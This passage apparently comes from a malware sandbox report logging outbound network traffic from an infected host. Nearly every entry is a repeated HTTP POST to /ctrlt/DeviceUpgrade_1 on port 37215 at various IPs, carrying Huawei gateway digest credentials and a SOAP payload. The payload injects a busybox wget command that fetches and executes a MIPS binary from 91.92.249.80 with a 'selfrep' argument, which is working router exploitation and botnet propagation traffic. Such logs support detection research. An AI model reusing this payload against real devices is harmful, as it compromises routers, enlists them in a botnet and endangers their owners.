[TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1633192.168.2.233526641.130.21.2737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.507838011 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1634192.168.2.234232841.201.155.7137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.509541035 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1635192.168.2.2357750197.167.145.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.509558916 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1636192.168.2.234679885.229.33.15937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.509578943 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1637192.168.2.2337420157.14.223.537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.510251999 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1638192.168.2.2343492157.132.1.12837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.510279894 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1639192.168.2.2333326196.252.179.2937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.510325909 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1640192.168.2.2333804157.163.236.25337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.510328054 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1641192.168.2.2342634188.146.195.4037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.510368109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1642192.168.2.2336360197.121.237.7237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.510370016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1643192.168.2.234472867.139.193.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.510377884 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
